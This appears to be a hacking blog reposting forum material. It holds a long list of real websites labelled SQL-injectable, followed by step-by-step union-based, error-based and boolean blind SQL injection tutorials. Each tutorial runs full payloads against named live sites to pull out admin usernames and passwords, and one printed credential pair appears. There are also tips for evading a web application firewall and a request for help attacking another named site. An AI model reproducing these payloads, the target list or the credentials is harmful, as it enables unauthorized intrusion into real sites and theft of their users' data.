Showing posts with label sql injection. Show all posts
Showing posts with label sql injection. Show all posts

sql vunrable

Posted by 67 On 04:13

http://www.4ips.biz/products.php?id=7
http://www.absolutenorth.co.nz/news_display.php?id=155
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=5
http://www.rockiurbanfitness.com.au/trainers.php?id=8
http://www.arcdi.com/trainers.php?id=30
http://www.youronesourcefitness.com/trainers.php?id=34
http://www.sealfit.com/trainers.php?id=5
http://www.cvc.nl/trainers.php?id=25
http://www.olympiclanden.be/info/trainers.php
http://www.door.nl/trainers.php?id=5
http://www.phpcalendarscripts.com/buy.php?option=2
http://www.phpjabbers.com/buy.php?script=6
http://www.computerandvideogames.com/article.php?id=175552
http://www.nlcnet.org/article.php?id=613
http://www.corpwatch.org/article.php?id=13646
http://www.michaelpollan.com/article.php?id=87
http://www.phpbuddy.com/article.php?id=8
http://www.computerandvideogames.com/article.php?id=203174
http://www.nlcnet.org/article.php?id=562
http://www.michaelpollan.com/article.php?id=80
http://www.soaw.org/article.php?id=205
http://www.unitedforpeace.org/article.php?id=2136
http://www.soaw.org/article.php?id=530
http://www.democracyjournal.org/article.php?ID=6570
http://www.soaw.org/article.php?id=98
http://www.unitedforpeace.org/article.php?id=2854
http://www.democracyjournal.org/article.php?ID=6527
http://www.colorlines.com/article.php?ID=309
http://www.plusline.org/article.php?id=4695
http://www.vcn.com/knowledgebase/article.php?id=422
http://www.all.org/article.php?id=11934
http://www.computerandvideogames.com/article.php?id=215066
http://www.forestethics.org/article.php?id=1176
http://www.onradio.gr/play_old.php?id=388
http://www.j-diocese.org/newsdetail.php?id=3386
http://www.acutech-consulting.com/newsdetail.php?id=61
http://www.wichitafallscommerce.com/newsDetail.php?id=57
http://www.j-diocese.org/newsdetail.php?id=34
http://www.tasouganda.org/newsdetail.php?id=33
http://www.samuseum.org/about/newsdetail.php?uid=34
http://www.maimonides.org/upper/newsDetail.php?id=170
http://www.nayapatrika.com/newsdetail.php?id=807070311492449&n_id=23
http://www.congreso.net/newsdetail.php?id=65
http://www.nayapatrika.com/newsdetail.php?id=807100601595356&n_id=32
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=30
http://www.leadacidbatteryinfo.org/newsdetail.php?id=44
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=25
http://www.leadacidbatteryinfo.org/newsdetail.php?id=42
http://www.dpu.org.tw/En/newsDetail.php?Mode=News&ID=2008&ArticleID=50
http://www.e-motionsoftware.com/about/newsdetail.php?ID=2
http://www.komjuniti.com/newsdetail.php?id=102
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=12
http://www.epp.eu/newsdetail.php?newsID=434&hoofdmenuID=4&submenuID=49&subsubmenuID=147
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=11
http://www.paknavywr.com/newsDetail.php?id=5
http://www.prater.at/NewsDetail.php?Id=1360218
http://www.simoco.net/telecom/newsdetail.php?type=news&id=11
http://www.centralinnovation.co.uk/news/newsdetail.php?nid=1638
http://www.hoefner.ch/newsdetail.php?id=19
http://www.jfdp.org/newsDetail.php?id=8
http://www.hebron.com/english/gallery.php?id=170
http://www.frcphotos.com/gallery.php?id=194
http://www.melbournefineart.com.au/gallery.php?id=20
http://www.cwfarchives.com/Gallery.php?id=12
http://www.jymop.com/gallery.php?id=1919&img=6
http://www.jonbidwell.com/gallery.php?id=jb488
http://www.studiocromie.org/gallery.php?id_art=56&id=216
http://www.egotvonline.com/gallery.php?id=5
http://www.jonbidwell.com/gallery.php?gallery=&id=jb659
http://www.fag1.cn/news/newsone.php?id=38
http://www.fag1.cn/news/newsone.php?id=60
http://www.bbly.clxcpu.cn/newsone.php?id=369&pid=100023
http://www.nskks.cn/news/newsone.php?id=272
http://www.buchakademie.de/sem/sem.php3?id=928
http://www.go-whippet.co.uk/announce.php?id=9
http://www.planetizen.com/mobile/announce.php?id=38824
http://www.planetizen.com/mobile/announce.php?id=38897
http://www.indeliblevision.com/announce.php?mode=view&id=17
http://www.afrii.org/announce.php?id=1
http://www.sisonlgu.gov.ph/announce.php?id=3
http://www.worstpreviews.com/review.php?id=1008
http://www.pixelsurgeon.com/reviews/review.php?id=687
http://www.eyemagazine.com/review.php?id=85&rid=447
http://www.d-kaz.com/reviews/review.php?id=384
http://www.theatreview.co.nz/reviews/review.php?id=2195
http://www.bloody-disgusting.com/review.php?id=561
http://www.pixelsurgeon.com/reviews/review.php?id=268
http://www.bgra.net/2004/review.php?id=501&type=head
http://www.allaboutjazz.com/php/review.php?id=11772
http://www.icehw.net/review.php?id=100
http://www.paranormalromance.org/reviews/review.php?id=29221
http://www.deepintense.com/review.php?id=231
http://www.theatreview.org.nz/reviews/review.php?id=1886
http://www.geilunleashed.com/review.php?id=2
http://www.churchrater.com/review.php?id=257
http://www.chimpomatic.com/reviews/review.php?id=223
http://www.andygrace.com/viewphoto.php?id=41
http://www.chrisroyce.co.uk/album/viewPhoto.php?id=506
http://www.raypang.com/new/cryfield/viewphoto.php?id=208
http://www.evai.de/viewphoto.php?org=area&id=238
http://www.flugsimulatorbilder.de/viewphoto.php?id=28532
http://www.ddc.moph.go.th/showimg.php?id=128
http://www.puutera.com/showimg.php?id=5
http://www.stephensbuilder.com/showimg.php?id=8
http://www.medpharma-ae.com/showimg.php?id=160
http://www.ddc.moph.go.th/showimg.php?id=351
http://www.8op10.be/showimg.php?id=117
http://www.plumeriaexoticdesign.com.au/showImg.php?id=71
http://www.8op10.be/showimg.php?id=68
http://www.motor-europe.com/newscat.php?id=4
http://www.eanm.org/education/edu_facility/ther_dos/curriculum.php?navId=33
http://www.massbioed.org/educators/curriculum.php?page_function=detail&curriculum_id=9
http://www.girlsprep.org/LowerEastside/curriculum.php?id=9
http://www.mansci.uwaterloo.ca/undergrad/program/curriculum.php?id=4
http://www.a.com.mx/curriculum.php?id=25
http://www.salon52.ca/academies/curriculum.php?id=174
http://www.ducatindia.com/curriculum/curriculum.php?id=42
http://www.a.com.mx/curriculum.php?id=4
http://www.accompositors.com/compositores-curriculum.php?idComp=158
http://www.entijuanarte.com/curriculum.php?id=153
http://www.yepp-online.net/curriculum.php?id=46
http://www.yepp-eu.org/curriculum.php?id=56
http://www.americanschoolfes.com/curriculum.php?id=2
http://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=2
http://www.nikollelesi.org/galeri_info.php?l=a&ida=9
http://www.lezha.org/galeri_info.php?lang=AL&idr=309&ida=19
http://www.vanhuberta.co.id/material.php?cat=6
http://www.gkasparov.com/material.php?id=4619D15348175
http://www.fudim.org/seroportunidad/libreria/material.php?id=86
http://www.betanien.de/verlag/material/material.php?id=128
http://www.gbritain.net/humor.php?id=2
http://www.vestibularseriado.com.br/humor.php?id=1
http://www.blogdopastor.com.br/humor.php?subaction=showcomments&id=1185486996
http://www.cartagomola.com/humor.php?id=1
http://www.kupa.pl/pl/humor.php?id=16
http://www.radios.no/humor.php?kategori=2&view=true&id=522
http://www.blamm.com/top10.php?id=28
http://www.barlebao.com/top10.php?id=341
http://www.agroexchange.de/xchange/top10.php?id=1
http://www.esfhm.com/braguetazos/top10.php?id=3
http://www.poblanerias.com/clasificados/clasificados-top10.php?cat=2
http://www.adwelo.de/exchange/top10.php?id=1
http://www.jcquizas.nl/leden.php?id=3
http://www.okea.nl/leden.php?id=91
http://www.vnf-nijmegen.nl/leden.php?id=58
http://www.okea.nl/leden.php?id=64
http://www.businesscluboranjezwart.nl/leden.php?id=47
http://www.mijnsprinters.com/leden/leden.php?id=21
http://www.stchristoffel.nl/leden.php
http://www.businesscluboranjezwart.nl/leden.php?id=24
http://www.fov.nl/content/leden.php?id=102
http://www.uitslaopers.nl/leden.php?id=1
http://www.punch-basketball.nl/leden.php?state=view&id=607
http://www.ovbrm.nl/leden.php?l=leden&id=0015
http://www.vwbusclub.be/leden.php?currentpage=leden&id=10
http://www.talskerwoelfe.de/mitglieder.php?id=12
http://www.vwgoe.at/mitglieder.php?id=201
http://www.dreizunull.net/manager/mitglieder.php?id=103
http://www.bogensport.li/bsv/mitglieder.php?st=3&id=6
http://www.versicherungsverband.li/mitglieder.php?id=5
http://www.fotoclub-dresden.de/mitglieder.php?id=46
http://www.azijnfabriek.nl/nieuws.php?id=137
http://www.nedap.com/nieuws.php?id=30
http://www.somnio.nl/nieuws.php?id=1
http://www.orientatie.org/nieuws.php?id=141
http://www.ampco.be/_nl/nieuws.php?id=14
http://www.comicbase.nl/nieuws.php?ID=574
http://www.friespopnet.nl/nieuws.php?id=844
http://www.iksbv.nl/nieuws.php?ID=18
http://www.zandvoortinbeeld.nl/nieuws.php?id=688
http://www.tijlbeckand.nl/site/nieuws.php?id=61670
http://www.toppigeons.nl/nieuws.php?id=4210
http://www.labyrinthonderzoek.nl/nieuws.php?id=189
http://www.schaatspeloton.nl/nieuws/nieuws.php?id=1128
http://www.willemvdwal.nl/beelden.php?id=7
http://www.liesbettol.nl/galerij.php?id=3
http://www.bwakielce.wici.info/galerie.php?id=4
http://www.irishcob.cz/galerie.php?id=16
http://www.pixheaven.net/galerie.php?id=18
http://www.wiese-immobilien.com/galerie.php?mode=immo_bild&id=37
http://www.labush.com/v4/galerie.php?type=&id=&nb=1
http://www.komiks.cz/galerie.php?action=galerie&id=187
http://www.bbcc.ch/galerie.php?id=15
http://www.ccsh.cz/galerie.php?id=61
http://www.cssd-jicin.cz/galerie.php?id=49
http://www.glamorescort.com/galerie.php?id=178
http://www.isabelle-faucher.com/galerie.php?id=10
http://www.paves-reseau.be/membres.php?p=1&id=1
http://www.aicim.be/main/fr/membres.php?provider=MWA&offset=90
http://www.paves-reseau.be/membres.php?p=1&id=8
http://www.rez-gif.supelec.fr/~sono/membres.php?id=2004
http://www.kiwanisalma.qc.ca/pages/membres.php?id=14
http://www.asp-php.net/tutorial/asp-php/dmx-membres.php?page=2
http://www.ucq-amiens.org/comites/membres.php?id=27
http://www.groupeart.com/membres.php?id=53
http://www.opw.be/membres.php?id=ro6&tid=2&docid=224
http://www.cdpcdc.fr/Membres.php?id=48
http://www.tipsportarena.cz/multifunkcni-areal/hotel.php?lang=en&id=4
https://www.azores.com/reservations/hotel.php?id=4
http://www.sistemalagodicomo.it/hotel.php?id=4
http://www.zeegarden.com/hotel.php?id=4
http://www.solvera.la/hotel.php?id=4
http://www.skifrance.cz/tignes-hotel.php?id=4
http://www.hotelandmore.it/hotel.php/id=4
http://www.info-alberghi.com/hotel.php?id=4
http://www.varazze.com/hotel/hotel.php?id=4
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=4
http://www.info-alberghi.com/hotel.php?id=12
http://www.manos-travel.hu/hotel.php?id=12
http://www.barcatours.sk/hotel.php?id=12
http://www.ogar.cz/2007/hotel.php?stred=aktuality_det&id=12
http://www.olomouc.com/ubytovani/hotel.php?id=12
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=12
http://www.guesthotels.eu/hotel.php?id=12
http://www.aiatour.com/hotel.php?id=5&stars=3
https://www.azores.com/reservations/hotel.php?id=5
http://www.tossahoteles.com/hotel.php?id=5
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=5
http://www.dreamtravel.bg/hotel.php?id=5
http://www.varazze.com/hotel/hotel.php?id=5
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=5
http://www.bountyclub.dk/hotel.php?id=5
http://www.conference-halls.com/hotel.php?id=6
http://www.nextholidaysrilanka.com/hotel.php?id=6
http://www.teztour.bg/hotel.php?id=6
http://www.manos-travel.hu/hotel.php?id=6
http://www.rexhotels.it/ita/hotel.php?id=6
http://www.sistemalagodicomo.it/hotel.php?id=6
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=6
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=6
http://www.gamatours-mg.com/hotel.php?page=1&id=6
http://www.corpotour.ru/hotel.php?id=6
http://www.aiatour.com/hotel.php?id=7&stars=3
http://www.conference-halls.com/hotel.php?id=7
http://www.sunoceanmaldives.com/resorts-hotel.php?id=7
http://www.tossahoteles.com/hotel.php?id=7
http://www.manos-travel.hu/hotel.php?id=7
http://www.info-alberghi.com/hotel.php?id=7
http://www.teztour.bg/hotel.php?id=7
http://www.info-alberghi.com/fr/hotel.php?id=7
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=7
http://www.sistemalagodicomo.it/hotel.php?id=7
http://www.swts.ru/hotels/hotel.php?id=7
http://www.condorferries.fr/GLOBAL/pages/week-end_et_sejours/hotel.php?id=7
http://www.apps2009.com/images.php?id=2
http://www.xtraflex.nl/ht2/images.php?imggroep=gr1&ID=2&taal=du&ID=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=2
http://www.connexion.fm/images.php?lang=fr&id=2
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=2
http://www.suteatar.org/images.php?id=2
http://www.sokit.cz/images.php?id=3&img=4
http://www.990000.com/images.php?id=3
http://www.millerkittredge.com/pictures/elwood/images.php?id=3
http://www.seeb.net.pl/portfolio/images.php?id=3
http://www.suteatar.org/images.php?id=3
http://www.nexxrattan.hu/images.php?id=3
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=3
http://www.fleuraugustinus.nl/images.php?id=3
http://www.oobgolf.com/golfers/images.php?id=4
http://www.990000.com/images.php?id=4
http://www.granitestatemillworks.com/files/images.php?ID=4
http://www.guilhermedesigner.net/images.php?id=4
http://www.xtraflex.nl/ht2/images.php?imggroep=gr1&ID=2&taal=du&ID=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=4
http://www.nexxrattan.hu/images.php?id=4
http://www.990000.com/images.php?id=5
http://www.ms-hariri.com/images.php?id=5
http://www.bedandbreakfast-gent.be/_en/images.php?id=5
http://www.humourjuif.com/images/images.php?id=5
http://www.nexxrattan.hu/images.php?id=5
http://www.ewno.com/images.php?category=7
http://www.safe.org.nz/images.php?oid=6520
http://www.zabeelinvestments.com/images.php?cat=3
http://www.candycreations.net/images.php?cat=11&page=3
http://www.communipix.com/images.php
http://www.madjokes.co.uk/?page=images.php
http://www.candycreations.net/images.php?cat=17
http://www.brendamurphy.com/images.php?cat=8
http://www.plantdetectives.com/images.php?cat=8
http://www.camp4.com/photos/images.php?user=Unitao
http://www.perspective2013.info/images.php?cat=2
http://www.onf-nfb.gc.ca/eng/collection/film/galerie-images.php?id=16531

Detailed Basic and Full SQL Injection Tutorial

Posted by 67 On 04:09

This summary is not available. Please click here to view the post.

♦ [Updated!] Fully Vulnerable Sites!! #2 [SQLi] ♦♦

Posted by 67 On 04:06

Tested most of them, have fun guys <3
A bit more then last time.

http://pastebin.com/pLFq9L9D
[Image: downfallsignature.png]

[Tutorial] Getting Data From Multiple Databases [SQLi]

Posted by 67 On 04:02

So I've been seeing alot of sites with multiple databases, and since I haven't seen a tutorial on this, I figured it would help out some beginners.

I'll be using this link as an example.
http://www.hubbardbrook.org/people/view.php?id=109'

Once you got your columns count, and vulnerable columns, you want to get the names of the databases.
You can do that by using:
Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16, ​17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are 2 different databases, one called "hbr" and one called "mysql". Now we want to see which one is the default, or current one. First write those down in notepad or something.

To find out, you pick your column, and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,1 ​7,18,19,20,21,22,23,24,25--

Now where column 4 was (my vulnerable column), we can see "hbr". So we know that's the current database. Now of course, you'd want to search through it to find your tables to see if you can find some login info. You would get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=data ​base()--

There's over 100 tables, but I didn't see anything that resembled user info, so now we check the other database. It's almost the same thing as finding the default tables. My other database name was called "mysql".
To get the tables of that, we convert it to hex, and use:
Code:
where+table_schema=0xdatabasehexhere
So the hex of "mysql" is 6d7973716c
Make sure you always add 0x in front of your hex.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d ​7973716c--

Now we got the tables from the second database, and we can see that theres a table named user!

Now we get the info from the users table, but make sure you keep the table_schema for that database. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16, ​ 17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x ​6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So basically what I did was converted my table name to hex, and got the columns from the database.
Now we want the data from the columns. It's still almost the same, except for the very last bit.
There are 2 columns named "User" and "Password", which is what we want.
So make your group_concat function, but at the end, the syntax would be:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12, ​13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And as you can see, there are now logins where your column name was.
Hope you guys understood, happy hacking!
Victoire

[X-Mas Special][Tutorial]Error Based Injection [Pics/Detailed][Bonus!]

Posted by 67 On 04:00

Introduction

So lately I've been trying to take the time to make an error based tutorial..
I should have been had it done, but I was saving it for 1337 posts!

Anyways, I'll be using this site as an example.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52

You don't need to go into error based for this site, but I'm going to anyways, just for the tutorial.
Error Based Injection is really helpful when you run into what I call "stupid errors". Here's a few examples.

Code:
1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

The list goes on, it's really useful for times like these..

Getting The Version

So what we want to to, is force an error by duplicating what we want out of the site.
Let's check the version before we go into getting the tables, because if it's less then 5, these queries won't work because information_schema doesn't exist.

Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

So now my url looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+ha ​ving+min(0)+or+1--

What we want to look for, is the duplicate entry error. As you can see, the site has the error.

Code:
Duplicate entry '5.1.52-log~1' for key 'group_key'


Getting The Table Names

Now we know information_schema exists, so we can use it to get data out of the tables.

So now let's start by getting our table names.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam ​ e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE ​ X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ​ _schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+ ​group+by+x)a)

We get our duplicate entry, for our first table name.


Now we have to use limit to get the next table name.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ​ _schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+ ​group+by+x)a)


Now that we know how to get our table names, we just keep incrementing in the limit statement until we come across a "juicy" table.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ​ _schema=database()+limit+10,1),floor(rand(0)*2))x+from+information_schema.tables ​+group+by+x)a)

Oh looky, tbladmin!


Getting The Columns

Now we want to get the columns, out of that table. So we change our syntax up a little bit, and hex our table name.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_na ​ me+as+char),0x7e))+from+information_schema.columns+where+table_name=0xHEXOFTABLE ​ +limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ​ le_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema ​.tables+group+by+x)a)

Remember when we HEX our table name, 0x always goes in front.
74626c61646d696e is the hex of my table name, which was tbladmin.

So far we have adminid


Now we increment in our limit statement until we get the columns we want.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ​ le_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema ​.tables+group+by+x)a)

That returns to username.


Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ​ le_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema ​.tables+group+by+x)a)

That returns to password.


Getting Data Out Of Columns

So now we have adminid, username, and password.

Now we put those in a concat statement, from the table we want.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(co ​ lumn1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor ​(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ​ oncat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbla ​ dmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

And I get the duplicate entry for the adminid, username, and password.

Code:
Duplicate entry '1~ishir~ishir123~1' for key 'group_key'


BONUS!

I'm going to be explaining a few functions, that way you can get a better understanding of what you're actually doing.

The Count Function

This is pretty obvious, it counts something. It's an easy way to check how many databases/tables there are. You can use this in many different injections, here's a few ways to use it in the following injections.

Lets say 3 is our vulnerable column, out of 5 columns.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,count(schema_name),4,5+from+information_schema​.schemata--
String Based:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,count(schema_name),4,5+from+information_schem​a.schemata-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ​ ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, ​1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Blind:
Code:
www.site.com/dork.php?id=5+and+ascii(substring((select+concat(count(schema_name))+from+inform ​ation_schema.schemata+limit+0,1),1,1))>0

The Substring Function
Now this is really useful in blind injection, because you need to get things letter by letter.
Sometimes you might go into error based injection, and get the error of "Subquery returns more then 1 row".

Example, lets say we want the first letter of the information from the username column, from the admin table.

Code:
substring(DATA, start length, end length)

So lets say the username is admin, and the table name is admin.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,1)+from+admin--

The returned letter would be 'a' because that's the first letter.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,5)+from+admin--

The returned value would be 'admin' because it ends at the 5th letter, which is admin.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,3,5)+from+admin--

The returned value would be 'min', because it starts at the 3rd letter, and ends at the 5th.

String Injection:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,substring(username,1,1)+from+admin-- x

Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ​ ast(concat(substring(username,1,1))+as+char),0x7e))+from+admin+limit+0,1),floor( ​rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Concat & Limit
For some sites, the function group_concat, concat,or concat_ws won't exist, so you'd need to use limit.

Lets say our table name is admin, and we get an error when we try something like...

Code:
www.site.com/dork.php?id=null+union+select+1,2,group_concat(table_name,0x0a),4,5+from+informa ​tion_schema.tables+where+table_schema=database()--

"Function group_concat does not exist in blahblahblah".

Instead, we'd use limit and concat, or just table_name to get them.

Code:
www.site.com/dork.php?id=null+union+select+1,2,table_name,4,5+from+information_schema.tables+ ​where+table_schema=database()+limit+0,1--

It would give us our first table name.

Like & Between

Is the WAF getting on your nerves when you're trying to use =?
You can use keywords to get around that.

Let's say our table name is admin, and we're trying to get columns out of it.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name=0x61646d696e--

We get our 403/406 error. We can use "Like" instead of =.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name+like+0x61646d696e--

You can also use between, and it works the same way...

Well I'll be updating this soon, once I think of more stuff to add onto it.
Please leave a comment if you learned something/liked it, thanks alot!

Special shoutout to a few members in this section:
benzi
kobez
webb
zerofreak
neogoo123
Hooded Robin
Zer0Pwn
๖ۣۜΗ α x O r ♥ & Team Intra
The Eminence Help Desk
.bLaZeD
Awakened

Sorry if I missed a few of you guys, Merry Christmas everyone, hope you're having a wonderful time.

PS: Woot, 1337 posts!

-DownFall
[Image: downfallsignature.png]

[Help] Advanced WAF [Blind Injection]

Posted by 67 On 03:55

I tried guessing a few column names from the admin table, but I got no luck....I counted the columns, there's 81, and I can't be fucked to get the column names letter by letter for the whole site.

So here's my syntax, it blocks table_name, if I can get around it, it would save me about 10 hours of time lol.

Here's my syntax, I tried a few commenting and a few other things, no luck.

Code:
www.natalpress.com.br/humor.php?id=7775+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x61646d696 ​e+limit+0,1),1,1))>0
[Image: downfallsignature.png]

[Detailed] Boolean Based Blind Injection [Tutorial]

Posted by 67 On 03:48

Introduction

So a lot of people view bling injection as having to guess everything, when it's called blind injection because no data is visible on the page as an outcome.

Remember, whenever you're injecting a site, as long as information_schema exists (version 5 or more), then you can use it to get data out of a page. This includes table names, database names, columns, and all the rest..


Here's a quick tutorial on getting data using blind injection for versions 5 or above, without guessing the outcome.

If you want to read up on some basic blind injection, you can check out this tutorial here.

I'll be using this site as an example.

Getting The Version

Code:
http://cathedralhillpress.com/book.php?id=1

Let's start by getting the version, to see if we can use substring() to get data out of information_schema.

Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=5

It loads fine, now let's replace the 5 with a 4 to double check.

Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=4

As you can see, the page has a huge chunk of text and pictures missing off of the page.

Getting The Table Names

Now let's get the first character, of the first table name out of our database.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))>0

The page loaded fine, so we know our first characters' ascii value is more then 0.

So we increment 0 until we get around the area it will be in.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))>75

We know it's more then 75, so let's go up a little bit more.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))>80

Now we get our error, so let's go down, and change more then, to equals to get the exact value.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))=76

We get our error, so let's go up.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))=77

Another error, let's go up again.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),1,1))=78

And now it loads fine, so let's check the ascii value for 78.

You can check that here, by looking at the ASCII table.
ASCII Table

78 comes back to "N".

Now we know our first letter is N, so let's get the next letter by incrementing the 1, to a 2, in our substring() statement.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),2,1))>100

We know it's more then 100, so let's go up to 101 now.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),2,1))>101

We get our error. If the returned value is greater then 100, but not greater then 101, then it has to be 101. It's common sense.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),2,1))=101

And it loads fine...Now convert the ascii value of 101 to text. It comes back to "e".

So far we have "Ne"

Now you can either keep getting the returned values, or try and guess the table name. It looks like News, so let's get our next character and guess.

The ascii value of "w" is 119, so let's see if it comes out positive.


Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),3,1))=119

It loads fine, so now we have "New".

Lets check the last one...

The value of "s" is 115, so let's guess again.

Code:
